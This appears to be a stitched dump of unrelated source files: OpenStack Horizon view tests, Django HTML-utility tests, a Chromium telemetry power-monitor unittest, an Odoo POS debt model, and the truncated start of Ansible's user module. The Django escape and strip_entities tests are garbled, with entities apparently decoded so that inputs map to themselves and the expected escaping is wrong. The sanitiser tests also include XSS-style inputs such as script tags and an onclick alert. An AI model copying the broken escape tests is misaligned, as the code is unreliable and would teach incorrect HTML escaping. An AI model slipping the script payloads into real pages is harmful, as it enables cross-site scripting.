self._check_role_list(keystone_api_version, role_assignments, groups,
proj_users, roles, workflow_data)
self.mox.ReplayAll()
# submit form data
project_data = {"domain_id": project._info["domain_id"],
"name": project._info["name"],
"id": project.id,
"description": project._info["description"],
"enabled": project.enabled}
workflow_data.update(project_data)
workflow_data.update(updated_quota)
url = reverse('horizon:identity:projects:update',
args=[self.tenant.id])
res = self.client.post(url, workflow_data)
self.assertNoFormErrors(res)
self.assertMessageCount(error=2, warning=1)
self.assertRedirectsNoFollow(res, INDEX_URL)
# django 1.7 and later does not handle the thrown keystoneclient
# exception well enough.
# TODO(mrunge): re-check when django-1.8 is stable
@unittest.skipIf(django.VERSION >= (1, 7, 0),
'Currently skipped with Django >= 1.7')
@test.create_stubs({api.keystone: ('get_default_role',
'tenant_get',
'domain_get'),
quotas: ('get_tenant_quota_data',
'get_disabled_quotas')})
def test_update_project_when_default_role_does_not_exist(self):
project = self.tenants.first()
domain_id = project.domain_id
quota = self.quotas.first()
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(None) # Default role doesn't exist
api.keystone.tenant_get(IsA(http.HttpRequest), self.tenant.id,
admin=True) \
.AndReturn(project)
api.keystone.domain_get(IsA(http.HttpRequest), domain_id) \
.AndReturn(self.domain)
quotas.get_disabled_quotas(IsA(http.HttpRequest)) \
.AndReturn(self.disabled_quotas.first())
quotas.get_tenant_quota_data(IsA(http.HttpRequest),
tenant_id=self.tenant.id) \
.AndReturn(quota)
self.mox.ReplayAll()
url = reverse('horizon:identity:projects:update',
args=[self.tenant.id])
try:
# Avoid the log message in the test output when the workflow's
# step action cannot be instantiated
logging.disable(logging.ERROR)
with self.assertRaises(exceptions.NotFound):
self.client.get(url)
finally:
logging.disable(logging.NOTSET)
class UsageViewTests(test.BaseAdminViewTests):
def _stub_nova_api_calls(self, nova_stu_enabled=True):
self.mox.StubOutWithMock(api.nova, 'usage_get')
self.mox.StubOutWithMock(api.nova, 'tenant_absolute_limits')
self.mox.StubOutWithMock(api.nova, 'extension_supported')
self.mox.StubOutWithMock(api.cinder, 'tenant_absolute_limits')
api.nova.extension_supported(
'SimpleTenantUsage', IsA(http.HttpRequest)) \
.AndReturn(nova_stu_enabled)
def _stub_neutron_api_calls(self, neutron_sg_enabled=True):
self.mox.StubOutWithMock(api.neutron, 'is_extension_supported')
self.mox.StubOutWithMock(api.network, 'floating_ip_supported')
self.mox.StubOutWithMock(api.network, 'tenant_floating_ip_list')
if neutron_sg_enabled:
self.mox.StubOutWithMock(api.network, 'security_group_list')
api.neutron.is_extension_supported(
IsA(http.HttpRequest),
'security-group').AndReturn(neutron_sg_enabled)
api.network.floating_ip_supported(IsA(http.HttpRequest)) \
.AndReturn(True)
api.network.tenant_floating_ip_list(IsA(http.HttpRequest)) \
.AndReturn(self.floating_ips.list())
if neutron_sg_enabled:
api.network.security_group_list(IsA(http.HttpRequest)) \
.AndReturn(self.q_secgroups.list())
def test_usage_csv(self):
self._test_usage_csv(nova_stu_enabled=True)
def test_usage_csv_disabled(self):
self._test_usage_csv(nova_stu_enabled=False)
def _test_usage_csv(self, nova_stu_enabled=True):
now = timezone.now()
usage_obj = api.nova.NovaUsage(self.usages.first())
self._stub_nova_api_calls(nova_stu_enabled)
api.nova.extension_supported(
'SimpleTenantUsage', IsA(http.HttpRequest)) \
.AndReturn(nova_stu_enabled)
start = datetime.datetime(now.year, now.month, 1, 0, 0, 0, 0)
end = datetime.datetime(now.year, now.month, now.day, 23, 59, 59, 0)
if nova_stu_enabled:
api.nova.usage_get(IsA(http.HttpRequest),
self.tenant.id,
start, end).AndReturn(usage_obj)
api.nova.tenant_absolute_limits(IsA(http.HttpRequest))\
.AndReturn(self.limits['absolute'])
api.cinder.tenant_absolute_limits(IsA(http.HttpRequest)) \
.AndReturn(self.cinder_limits['absolute'])
self._stub_neutron_api_calls()
self.mox.ReplayAll()
project_id = self.tenants.first().id
csv_url = reverse('horizon:identity:projects:usage',
args=[project_id]) + "?format=csv"
res = self.client.get(csv_url)
self.assertTemplateUsed(res, 'project/overview/usage.csv')
self.assertTrue(isinstance(res.context['usage'], usage.ProjectUsage))
hdr = ('Instance Name,VCPUs,RAM (MB),Disk (GB),Usage (Hours),'
'Time since created (Seconds),State')
self.assertContains(res, '%s\r\n' % hdr)
class DetailProjectViewTests(test.BaseAdminViewTests):
@test.create_stubs({api.keystone: ('tenant_get',)})
def test_detail_view(self):
project = self.tenants.first()
api.keystone.tenant_get(IsA(http.HttpRequest), self.tenant.id) \
.AndReturn(project)
self.mox.ReplayAll()
res = self.client.get(PROJECT_DETAIL_URL, args=[project.id])
self.assertTemplateUsed(res, 'identity/projects/detail.html')
self.assertEqual(res.context['project'].name, project.name)
self.assertEqual(res.context['project'].id, project.id)
self.assertContains(res, "Project Details: %s" % project.name,
1, 200)
@test.create_stubs({api.keystone: ('tenant_get',)})
def test_detail_view_with_exception(self):
project = self.tenants.first()
api.keystone.tenant_get(IsA(http.HttpRequest), self.tenant.id) \
.AndRaise(self.exceptions.keystone)
self.mox.ReplayAll()
res = self.client.get(PROJECT_DETAIL_URL, args=[project.id])
self.assertRedirectsNoFollow(res, INDEX_URL)
@unittest.skipUnless(os.environ.get('WITH_SELENIUM', False),
"The WITH_SELENIUM env variable is not set.")
class SeleniumTests(test.SeleniumAdminTestCase):
@test.create_stubs(
{api.keystone: ('tenant_list', 'tenant_get', 'tenant_update')})
def test_inline_editing_update(self):
# Tenant List
api.keystone.tenant_list(IgnoreArg(),
domain=None,
marker=None,
paginate=True) \
.AndReturn([self.tenants.list(), False])
# Edit mod
api.keystone.tenant_get(IgnoreArg(),
u'1',
admin=True) \
.AndReturn(self.tenants.list()[0])
# Update - requires get and update
api.keystone.tenant_get(IgnoreArg(),
u'1',
admin=True) \
.AndReturn(self.tenants.list()[0])
api.keystone.tenant_update(
IgnoreArg(),
u'1',
description='a test tenant.',
enabled=True,
name=u'Changed test_tenant')
# Refreshing cell with changed name
changed_tenant = copy.copy(self.tenants.list()[0])
changed_tenant.name = u'Changed test_tenant'
api.keystone.tenant_get(IgnoreArg(),
u'1',
admin=True) \
.AndReturn(changed_tenant)
self.mox.ReplayAll()
self.selenium.get("%s%s" % (self.live_server_url, INDEX_URL))
# Check the presence of the important elements
td_element = self.selenium.find_element_by_xpath(
"//td[@data-update-url='/identity/?action=cell_update"
"&table=tenants&cell_name=name&obj_id=1']")
cell_wrapper = td_element.find_element_by_class_name(
'table_cell_wrapper')
edit_button_wrapper = td_element.find_element_by_class_name(
'table_cell_action')
edit_button = edit_button_wrapper.find_element_by_tag_name('button')
# Hovering over td and clicking on edit button
action_chains = ActionChains(self.selenium)
action_chains.move_to_element(cell_wrapper).click(edit_button)
action_chains.perform()
# Waiting for the AJAX response for switching to editing mod
wait = self.ui.WebDriverWait(self.selenium, 10,
ignored_exceptions=[socket_timeout])
wait.until(lambda x: self.selenium.find_element_by_name("name__1"))
# Changing project name in cell form
td_element = self.selenium.find_element_by_xpath(
"//td[@data-update-url='/identity/?action=cell_update"
"&table=tenants&cell_name=name&obj_id=1']")
name_input = td_element.find_element_by_tag_name('input')
name_input.send_keys(keys.Keys.HOME)
name_input.send_keys("Changed ")
# Saving new project name by AJAX
td_element.find_element_by_class_name('inline-edit-submit').click()
# Waiting for the AJAX response of cell refresh
wait = self.ui.WebDriverWait(self.selenium, 10,
ignored_exceptions=[socket_timeout])
wait.until(lambda x: self.selenium.find_element_by_xpath(
"//td[@data-update-url='/identity/?action=cell_update"
"&table=tenants&cell_name=name&obj_id=1']"
"/div[@class='table_cell_wrapper']"
"/div[@class='table_cell_data_wrapper']"))
# Checking new project name after cell refresh
data_wrapper = self.selenium.find_element_by_xpath(
"//td[@data-update-url='/identity/?action=cell_update"
"&table=tenants&cell_name=name&obj_id=1']"
"/div[@class='table_cell_wrapper']"
"/div[@class='table_cell_data_wrapper']")
self.assertTrue(data_wrapper.text == u'Changed test_tenant',
"Error: saved tenant name is expected to be "
"'Changed test_tenant'")
@test.create_stubs(
{api.keystone: ('tenant_list', 'tenant_get')})
def test_inline_editing_cancel(self):
# Tenant List
api.keystone.tenant_list(IgnoreArg(),
domain=None,
marker=None,
paginate=True) \
.AndReturn([self.tenants.list(), False])
# Edit mod
api.keystone.tenant_get(IgnoreArg(),
u'1',
admin=True) \
.AndReturn(self.tenants.list()[0])
# Cancel edit mod is without the request
self.mox.ReplayAll()
self.selenium.get("%s%s" % (self.live_server_url, INDEX_URL))
# Check the presence of the important elements
td_element = self.selenium.find_element_by_xpath(
"//td[@data-update-url='/identity/?action=cell_update"
"&table=tenants&cell_name=name&obj_id=1']")
cell_wrapper = td_element.find_element_by_class_name(
'table_cell_wrapper')
edit_button_wrapper = td_element.find_element_by_class_name(
'table_cell_action')
edit_button = edit_button_wrapper.find_element_by_tag_name('button')
# Hovering over td and clicking on edit
action_chains = ActionChains(self.selenium)
action_chains.move_to_element(cell_wrapper).click(edit_button)
action_chains.perform()
# Waiting for the AJAX response for switching to editing mod
wait = self.ui.WebDriverWait(self.selenium, 10,
ignored_exceptions=[socket_timeout])
wait.until(lambda x: self.selenium.find_element_by_name("name__1"))
# Click on cancel button
td_element = self.selenium.find_element_by_xpath(
"//td[@data-update-url='/identity/?action=cell_update"
"&table=tenants&cell_name=name&obj_id=1']")
td_element.find_element_by_class_name('inline-edit-cancel').click()
# Cancel is via javascript, so it should be immediate
# Checking that tenant name is not changed
data_wrapper = self.selenium.find_element_by_xpath(
"//td[@data-update-url='/identity/?action=cell_update"
"&table=tenants&cell_name=name&obj_id=1']"
"/div[@class='table_cell_wrapper']"
"/div[@class='table_cell_data_wrapper']")
self.assertTrue(data_wrapper.text == u'test_tenant',
"Error: saved tenant name is expected to be "
"'test_tenant'")
@test.create_stubs({api.keystone: ('get_default_domain',
'get_default_role',
'user_list',
'group_list',
'role_list'),
api.base: ('is_service_enabled',),
quotas: ('get_default_quota_data',)})
def test_membership_list_loads_correctly(self):
member_css_class = ".available_members"
users = self.users.list()
api.base.is_service_enabled(IsA(http.HttpRequest), 'network') \
.MultipleTimes().AndReturn(False)
api.base.is_service_enabled(IsA(http.HttpRequest), 'volume') \
.MultipleTimes().AndReturn(False)
api.keystone.get_default_domain(IsA(http.HttpRequest)) \
.AndReturn(self.domain)
quotas.get_default_quota_data(IsA(http.HttpRequest)) \
.AndReturn(self.quotas.first())
api.keystone.get_default_role(IsA(http.HttpRequest)) \
.MultipleTimes().AndReturn(self.roles.first())
api.keystone.user_list(IsA(http.HttpRequest), domain=self.domain.id) \
.AndReturn(users)
api.keystone.role_list(IsA(http.HttpRequest)) \
.AndReturn(self.roles.list())
api.keystone.group_list(IsA(http.HttpRequest), domain=self.domain.id) \
.AndReturn(self.groups.list())
api.keystone.role_list(IsA(http.HttpRequest)) \
.AndReturn(self.roles.list())
self.mox.ReplayAll()
self.selenium.get("%s%s" %
(self.live_server_url,
reverse('horizon:identity:projects:create')))
members = self.selenium.find_element_by_css_selector(member_css_class)
for user in users:
self.assertIn(user.name, members.text)
|
apache-2.0
|
wfxiang08/django190
|
tests/utils_tests/test_html.py
|
34
|
10708
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
import os
from datetime import datetime
from django.test import SimpleTestCase, ignore_warnings
from django.utils import html, safestring, six
from django.utils._os import upath
from django.utils.deprecation import RemovedInDjango20Warning
from django.utils.encoding import force_text
class TestUtilsHtml(SimpleTestCase):
def check_output(self, function, value, output=None):
"""
Check that function(value) equals output. If output is None,
check that function(value) equals value.
"""
if output is None:
output = value
self.assertEqual(function(value), output)
def test_escape(self):
f = html.escape
items = (
('&', '&'),
('<', '<'),
('>', '>'),
('"', '"'),
("'", '''),
)
# Substitution patterns for testing the above items.
patterns = ("%s", "asdf%sfdsa", "%s1", "1%sb")
for value, output in items:
for pattern in patterns:
self.check_output(f, pattern % value, pattern % output)
# Check repeated values.
self.check_output(f, value * 2, output * 2)
# Verify it doesn't double replace &.
self.check_output(f, '<&', '<&')
def test_format_html(self):
self.assertEqual(
html.format_html("{} {} {third} {fourth}",
"< Dangerous >",
html.mark_safe("<b>safe</b>"),
third="< dangerous again",
fourth=html.mark_safe("<i>safe again</i>")
),
"< Dangerous > <b>safe</b> < dangerous again <i>safe again</i>"
)
def test_linebreaks(self):
f = html.linebreaks
items = (
("para1\n\npara2\r\rpara3", "<p>para1</p>\n\n<p>para2</p>\n\n<p>para3</p>"),
("para1\nsub1\rsub2\n\npara2", "<p>para1<br />sub1<br />sub2</p>\n\n<p>para2</p>"),
("para1\r\n\r\npara2\rsub1\r\rpara4", "<p>para1</p>\n\n<p>para2<br />sub1</p>\n\n<p>para4</p>"),
("para1\tmore\n\npara2", "<p>para1\tmore</p>\n\n<p>para2</p>"),
)
for value, output in items:
self.check_output(f, value, output)
def test_strip_tags(self):
f = html.strip_tags
items = (
('<p>See: 'é is an apostrophe followed by e acute</p>',
'See: 'é is an apostrophe followed by e acute'),
('<adf>a', 'a'),
('</adf>a', 'a'),
('<asdf><asdf>e', 'e'),
('hi, <f x', 'hi, <f x'),
('234<235, right?', '234<235, right?'),
('a4<a5 right?', 'a4<a5 right?'),
('b7>b2!', 'b7>b2!'),
('</fe', '</fe'),
('<x>b<y>', 'b'),
('a<p onclick="alert(\'<test>\')">b</p>c', 'abc'),
('a<p a >b</p>c', 'abc'),
('d<a:b c:d>e</p>f', 'def'),
('<strong>foo</strong><a href="http://example.com">bar</a>', 'foobar'),
# caused infinite loop on Pythons not patched with
# http://bugs.python.org/issue20288
('&gotcha&#;<>', '&gotcha&#;<>'),
)
for value, output in items:
self.check_output(f, value, output)
# Some convoluted syntax for which parsing may differ between python versions
output = html.strip_tags('<sc<!-- -->ript>test<<!-- -->/script>')
self.assertNotIn('<script>', output)
self.assertIn('test', output)
output = html.strip_tags('<script>alert()</script>&h')
self.assertNotIn('<script>', output)
self.assertIn('alert()', output)
# Test with more lengthy content (also catching performance regressions)
for filename in ('strip_tags1.html', 'strip_tags2.txt'):
path = os.path.join(os.path.dirname(upath(__file__)), 'files', filename)
with open(path, 'r') as fp:
content = force_text(fp.read())
start = datetime.now()
stripped = html.strip_tags(content)
elapsed = datetime.now() - start
self.assertEqual(elapsed.seconds, 0)
self.assertIn("Please try again.", stripped)
self.assertNotIn('<', stripped)
def test_strip_spaces_between_tags(self):
f = html.strip_spaces_between_tags
# Strings that should come out untouched.
items = (' <adf>', '<adf> ', ' </adf> ', ' <f> x</f>')
for value in items:
self.check_output(f, value)
# Strings that have spaces to strip.
items = (
('<d> </d>', '<d></d>'),
('<p>hello </p>\n<p> world</p>', '<p>hello </p><p> world</p>'),
('\n<p>\t</p>\n<p> </p>\n', '\n<p></p><p></p>\n'),
)
for value, output in items:
self.check_output(f, value, output)
@ignore_warnings(category=RemovedInDjango20Warning)
def test_strip_entities(self):
f = html.strip_entities
# Strings that should come out untouched.
values = ("&", "&a", "&a", "a&#a")
for value in values:
self.check_output(f, value)
# Valid entities that should be stripped from the patterns.
entities = ("", "", "&a;", "&fdasdfasdfasdf;")
patterns = (
("asdf %(entity)s ", "asdf "),
("%(entity)s%(entity)s", ""),
("&%(entity)s%(entity)s", "&"),
("%(entity)s3", "3"),
)
for entity in entities:
for in_pattern, output in patterns:
self.check_output(f, in_pattern % {'entity': entity}, output)
def test_escapejs(self):
f = html.escapejs
items = (
('"double quotes" and \'single quotes\'', '\\u0022double quotes\\u0022 and \\u0027single quotes\\u0027'),
(r'\ : backslashes, too', '\\u005C : backslashes, too'),
('and lots of whitespace: \r\n\t\v\f\b', 'and lots of whitespace: \\u000D\\u000A\\u0009\\u000B\\u000C\\u0008'),
(r'<script>and this</script>', '\\u003Cscript\\u003Eand this\\u003C/script\\u003E'),
('paragraph separator:\u2029and line separator:\u2028', 'paragraph separator:\\u2029and line separator:\\u2028'),
)
for value, output in items:
self.check_output(f, value, output)
@ignore_warnings(category=RemovedInDjango20Warning)
def test_remove_tags(self):
f = html.remove_tags
items = (
("<b><i>Yes</i></b>", "b i", "Yes"),
("<a>x</a> <p><b>y</b></p>", "a b", "x <p>y</p>"),
)
for value, tags, output in items:
self.assertEqual(f(value, tags), output)
def test_smart_urlquote(self):
quote = html.smart_urlquote
# Ensure that IDNs are properly quoted
self.assertEqual(quote('http://öäü.com/'), 'http://xn--4ca9at.com/')
self.assertEqual(quote('http://öäü.com/öäü/'), 'http://xn--4ca9at.com/%C3%B6%C3%A4%C3%BC/')
# Ensure that everything unsafe is quoted, !*'();:@&=+$,/?#[]~ is considered safe as per RFC
self.assertEqual(quote('http://example.com/path/öäü/'), 'http://example.com/path/%C3%B6%C3%A4%C3%BC/')
self.assertEqual(quote('http://example.com/%C3%B6/ä/'), 'http://example.com/%C3%B6/%C3%A4/')
self.assertEqual(quote('http://example.com/?x=1&y=2+3&z='), 'http://example.com/?x=1&y=2+3&z=')
self.assertEqual(quote('http://example.com/?x=<>"\''), 'http://example.com/?x=%3C%3E%22%27')
self.assertEqual(quote('http://example.com/?q=http://example.com/?x=1%26q=django'),
'http://example.com/?q=http%3A%2F%2Fexample.com%2F%3Fx%3D1%26q%3Ddjango')
self.assertEqual(quote('http://example.com/?q=http%3A%2F%2Fexample.com%2F%3Fx%3D1%26q%3Ddjango'),
'http://example.com/?q=http%3A%2F%2Fexample.com%2F%3Fx%3D1%26q%3Ddjango')
def test_conditional_escape(self):
s = '<h1>interop</h1>'
self.assertEqual(html.conditional_escape(s),
'<h1>interop</h1>')
self.assertEqual(html.conditional_escape(safestring.mark_safe(s)), s)
def test_html_safe(self):
@html.html_safe
class HtmlClass(object):
if six.PY2:
def __unicode__(self):
return "<h1>I'm a html class!</h1>"
else:
def __str__(self):
return "<h1>I'm a html class!</h1>"
html_obj = HtmlClass()
self.assertTrue(hasattr(HtmlClass, '__html__'))
self.assertTrue(hasattr(html_obj, '__html__'))
self.assertEqual(force_text(html_obj), html_obj.__html__())
def test_html_safe_subclass(self):
if six.PY2:
class BaseClass(object):
def __html__(self):
# defines __html__ on its own
return 'some html content'
def __unicode__(self):
return 'some non html content'
@html.html_safe
class Subclass(BaseClass):
def __unicode__(self):
# overrides __unicode__ and is marked as html_safe
return 'some html safe content'
else:
class BaseClass(object):
def __html__(self):
# defines __html__ on its own
return 'some html content'
def __str__(self):
return 'some non html content'
@html.html_safe
class Subclass(BaseClass):
def __str__(self):
# overrides __str__ and is marked as html_safe
return 'some html safe content'
subclass_obj = Subclass()
self.assertEqual(force_text(subclass_obj), subclass_obj.__html__())
def test_html_safe_defines_html_error(self):
msg = "can't apply @html_safe to HtmlClass because it defines __html__()."
with self.assertRaisesMessage(ValueError, msg):
@html.html_safe
class HtmlClass(object):
def __html__(self):
return "<h1>I'm a html class!</h1>"
def test_html_safe_doesnt_define_str(self):
method_name = '__unicode__()' if six.PY2 else '__str__()'
msg = "can't apply @html_safe to HtmlClass because it doesn't define %s." % method_name
with self.assertRaisesMessage(ValueError, msg):
@html.html_safe
class HtmlClass(object):
pass
|
bsd-3-clause
|
js0701/chromium-crosswalk
|
tools/telemetry/telemetry/internal/platform/power_monitor/sysfs_power_monitor_unittest.py
|
14
|
9018
|
# Copyright 2014 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
from telemetry.internal.platform import android_platform_backend
from telemetry.internal.platform.power_monitor import sysfs_power_monitor
class SysfsPowerMonitorMonitorTest(unittest.TestCase):
initial_freq = {
'cpu0': '1700000 6227\n1600000 0\n1500000 0\n1400000 28\n1300000 22\n'
'1200000 14\n1100000 19\n1000000 22\n900000 14\n800000 20\n'
'700000 15\n600000 23\n500000 23\n400000 9\n300000 28\n200000 179',
'cpu1': '1700000 11491\n1600000 0\n1500000 0\n1400000 248\n1300000 1166\n'
'1200000 2082\n1100000 2943\n1000000 6560\n900000 12517\n'
'800000 8690\n700000 5105\n600000 3800\n500000 5131\n400000 5479\n'
'300000 7571\n200000 133618',
'cpu2': '1700000 1131',
'cpu3': '1700000 1131'
}
final_freq = {
'cpu0': '1700000 7159\n1600000 0\n1500000 0\n1400000 68\n1300000 134\n'
'1200000 194\n1100000 296\n1000000 716\n900000 1301\n800000 851\n'
'700000 554\n600000 343\n500000 612\n400000 691\n300000 855\n'
'200000 15525',
'cpu1': '1700000 12048\n1600000 0\n1500000 0\n1400000 280\n1300000 1267\n'
'1200000 2272\n1100000 3163\n1000000 7039\n900000 13800\n'
'800000 9599\n700000 5655\n600000 4144\n500000 5655\n400000 6005\n'
'300000 8288\n200000 149724',
'cpu2': None,
'cpu3': ''
}
expected_initial_freq = {
'cpu0': {
1700000000: 6227,
1600000000: 0,
1500000000: 0,
1400000000: 28,
1300000000: 22,
1200000000: 14,
1100000000: 19,
1000000000: 22,
900000000: 14,
800000000: 20,
700000000: 15,
600000000: 23,
500000000: 23,
400000000: 9,
300000000: 28,
200000000: 179
},
'cpu1': {
1700000000: 11491,
1600000000: 0,
1500000000: 0,
1400000000: 248,
1300000000: 1166,
1200000000: 2082,
1100000000: 2943,
1000000000: 6560,
900000000: 12517,
800000000: 8690,
700000000: 5105,
600000000: 3800,
500000000: 5131,
400000000: 5479,
300000000: 7571,
200000000: 133618
},
'cpu2': {
1700000000: 1131
},
'cpu3': {
1700000000: 1131
}
}
expected_final_freq = {
'cpu0': {
1700000000: 7159,
1600000000: 0,
1500000000: 0,
1400000000: 68,
1300000000: 134,
1200000000: 194,
1100000000: 296,
1000000000: 716,
900000000: 1301,
800000000: 851,
700000000: 554,
600000000: 343,
500000000: 612,
400000000: 691,
300000000: 855,
200000000: 15525
},
'cpu1': {
1700000000: 12048,
1600000000: 0,
1500000000: 0,
1400000000: 280,
1300000000: 1267,
1200000000: 2272,
1100000000: 3163,
1000000000: 7039,
900000000: 13800,
800000000: 9599,
700000000: 5655,
600000000: 4144,
500000000: 5655,
400000000: 6005,
300000000: 8288,
200000000: 149724
},
'cpu2': None,
'cpu3': {}
}
expected_freq_percents = {
'platform_info': {
1700000000: 3.29254111574526,
1600000000: 0.0,
1500000000: 0.0,
1400000000: 0.15926805099535601,
1300000000: 0.47124116307273645,
1200000000: 0.818756100807525,
1100000000: 1.099381692400982,
1000000000: 2.5942528544384302,
900000000: 5.68661122326737,
800000000: 3.850545467654628,
700000000: 2.409691872245393,
600000000: 1.4693702487650486,
500000000: 2.4623575553879373,
400000000: 2.672038150383057,
300000000: 3.415770495015825,
200000000: 69.59817400982045
},
'cpu0': {
1700000000: 4.113700564971752,
1600000000: 0.0,
1500000000: 0.0,
1400000000: 0.1765536723163842,
1300000000: 0.4943502824858757,
1200000000: 0.7944915254237288,
1100000000: 1.2226341807909604,
1000000000: 3.0632062146892656,
900000000: 5.680614406779661,
800000000: 3.6679025423728815,
700000000: 2.379060734463277,
600000000: 1.4124293785310735,
500000000: 2.599752824858757,
400000000: 3.0102401129943503,
300000000: 3.650247175141243,
200000000: 67.73481638418079
},
'cpu1': {
1700000000: 2.4713816665187682,
1600000000: 0.0,
1500000000: 0.0,
1400000000: 0.1419824296743278,
1300000000: 0.44813204365959713,
1200000000: 0.8430206761913214,
1100000000: 0.9761292040110037,
1000000000: 2.1252994941875945,
900000000: 5.69260803975508,
800000000: 4.033188392936374,
700000000: 2.4403230100275093,
600000000: 1.526311118999024,
500000000: 2.3249622859171177,
400000000: 2.3338361877717633,
300000000: 3.1812938148904073,
200000000: 71.46153163546012
},
'cpu2': {
1700000000: 0.0,
},
'cpu3': {
1700000000: 0.0,
}
}
def testParseCpuFreq(self):
initial = sysfs_power_monitor.SysfsPowerMonitor.ParseFreqSample(
self.initial_freq)
final = sysfs_power_monitor.SysfsPowerMonitor.ParseFreqSample(
self.final_freq)
self.assertDictEqual(initial, self.expected_initial_freq)
self.assertDictEqual(final, self.expected_final_freq)
def testComputeCpuStats(self):
results = sysfs_power_monitor.SysfsPowerMonitor.ComputeCpuStats(
self.expected_initial_freq, self.expected_final_freq)
for cpu in self.expected_freq_percents:
for freq in results[cpu]:
self.assertAlmostEqual(results[cpu][freq],
self.expected_freq_percents[cpu][freq])
def testComputeCpuStatsWithMissingData(self):
results = sysfs_power_monitor.SysfsPowerMonitor.ComputeCpuStats(
{'cpu1': {}}, {'cpu1': {}})
self.assertEqual(results['cpu1'][12345], 0)
results = sysfs_power_monitor.SysfsPowerMonitor.ComputeCpuStats(
{'cpu1': {123: 0}}, {'cpu1': {123: 0}})
self.assertEqual(results['cpu1'][123], 0)
results = sysfs_power_monitor.SysfsPowerMonitor.ComputeCpuStats(
{'cpu1': {123: 456}}, {'cpu1': {123: 456}})
self.assertEqual(results['cpu1'][123], 0)
def testComputeCpuStatsWithNumberChange(self):
results = sysfs_power_monitor.SysfsPowerMonitor.ComputeCpuStats(
{'cpu1': {'C0': 10, 'WFI': 20}},
{'cpu1': {'C0': 20, 'WFI': 10}})
self.assertEqual(results['cpu1']['C0'], 0)
self.assertEqual(results['cpu1']['WFI'], 0)
def testGetCpuStateForAndroidDevices(self):
class PlatformStub(object):
def __init__(self, run_command_return_value):
self._run_command_return_value = run_command_return_value
def RunCommand(self, cmd):
del cmd # unused
return self._run_command_return_value
def PathExists(self, path):
return 'cpu0' in path or 'cpu1' in path
cpu_state_from_samsung_note3 = (
"C0\n\nC1\n\nC2\n\nC3\n\n"
"53658520886\n1809072\n7073\n1722554\n"
"1\n35\n300\n500\n"
"1412949256\n")
expected_cstate_dict = {
'C0': 1412895593940415,
'C1': 1809072,
'C2': 7073,
'C3': 1722554,
'WFI': 53658520886
}
cpus = ["cpu%d" % cpu for cpu in range(4)]
expected_result = dict(zip(cpus, [expected_cstate_dict]*2))
sysfsmon = sysfs_power_monitor.SysfsPowerMonitor(
PlatformStub(cpu_state_from_samsung_note3))
# pylint: disable=protected-access
sysfsmon._cpus = cpus
cstate = sysfsmon.GetCpuState()
result = android_platform_backend.AndroidPlatformBackend.ParseCStateSample(
cstate)
self.assertDictEqual(expected_result, result)
def testStandAlone(self):
class PlatformStub(object):
def __init__(self, run_command_return_value):
self._run_command_return_value = run_command_return_value
def RunCommand(self, cmd):
del cmd # unused
return self._run_command_return_value
def PathExists(self, path):
del path # unused
return True
cpu_state_from_samsung_note3 = (
"C0\n\nC1\n\nC2\n\nC3\n\n"
"53658520886\n1809072\n7073\n1722554\n"
"1\n35\n300\n500\n"
"1412949256\n")
expected_cstate_dict = {
'C0': 1412895593940415,
'C1': 1809072,
'C2': 7073,
'C3': 1722554,
'WFI': 53658520886
}
cpus = ["cpu%d" % cpu for cpu in range(2)]
expected_result = dict(zip(cpus, [expected_cstate_dict]*len(cpus)))
sysfsmon = sysfs_power_monitor.SysfsPowerMonitor(
PlatformStub(cpu_state_from_samsung_note3), standalone=True)
# pylint: disable=protected-access
sysfsmon._cpus = cpus
cstate = sysfsmon.GetCpuState()
result = android_platform_backend.AndroidPlatformBackend.ParseCStateSample(
cstate)
self.assertDictEqual(expected_result, result)
|
bsd-3-clause
|
Endika/pos-addons
|
pos_debt_notebook/models.py
|
9
|
2190
|
# -*- coding: utf-8 -*-
from openerp import models, fields, api
import openerp.addons.decimal_precision as dp
class ResPartner(models.Model):
_inherit = 'res.partner'
@api.multi
def _get_debt(self):
debt_account = self.env.ref('pos_debt_notebook.debt_account')
debt_journal = self.env.ref('pos_debt_notebook.debt_journal')
self._cr.execute(
"""SELECT l.partner_id, SUM(l.debit - l.credit)
FROM account_move_line l
WHERE l.account_id = %s AND l.partner_id IN %s
GROUP BY l.partner_id
""",
(debt_account.id, tuple(self.ids)))
res = {}
for partner in self:
res[partner.id] = 0
for partner_id, val in self._cr.fetchall():
res[partner_id] += val
statements = self.env['account.bank.statement'].search(
[('journal_id', '=', debt_journal.id), ('state', '=', 'open')])
if statements:
self._cr.execute(
"""SELECT l.partner_id, SUM(l.amount)
FROM account_bank_statement_line l
WHERE l.statement_id IN %s AND l.partner_id IN %s
GROUP BY l.partner_id
""",
(tuple(statements.ids), tuple(self.ids)))
for partner_id, val in self._cr.fetchall():
res[partner_id] += val
for partner in self:
partner.debt = res[partner.id]
debt = fields.Float(
compute='_get_debt', string='Debt', readonly=True,
digits=dp.get_precision('Account'))
class AccountJournal(models.Model):
_inherit = 'account.journal'
debt = fields.Boolean(string='Debt Payment Method')
class PosConfig(models.Model):
_inherit = 'pos.config'
debt_dummy_product_id = fields.Many2one(
'product.product', string='Dummy Product for Debt',
domain=[('available_in_pos', '=', True)], required=True,
help="Dummy product used when a customer pays his debt "
"without ordering new products. This is a workaround to the fact "
"that Odoo needs to have at least one product on the order to "
"validate the transaction.")
|
lgpl-3.0
|
ferrants/ansible-modules-core
|
system/user.py
|
13
|
70584
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2012, Stephen Fromm <sfromm@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
DOCUMENTATION = '''
---
module: user
author: Stephen Fromm
version_added: "0.2"
short_description: Manage user accounts
requirements: [ useradd, userdel, usermod ]
description:
- Manage user accounts and user attributes.
options:
name:
required: true
aliases: [ "user" ]
description:
- Name of the user to create, remove or modify.
comment:
required: false
description:
- Optionally sets the description (aka I(GECOS)) of user account.
uid:
required: false
description:
- Optionally sets the I(UID) of the user.
non_unique:
required: false
default: "no"
choices: [ "yes", "no" ]
description:
- Optionally when used with the -u option, this option allows to
change the user ID to a non-unique value.
version_added: "1.1"
group:
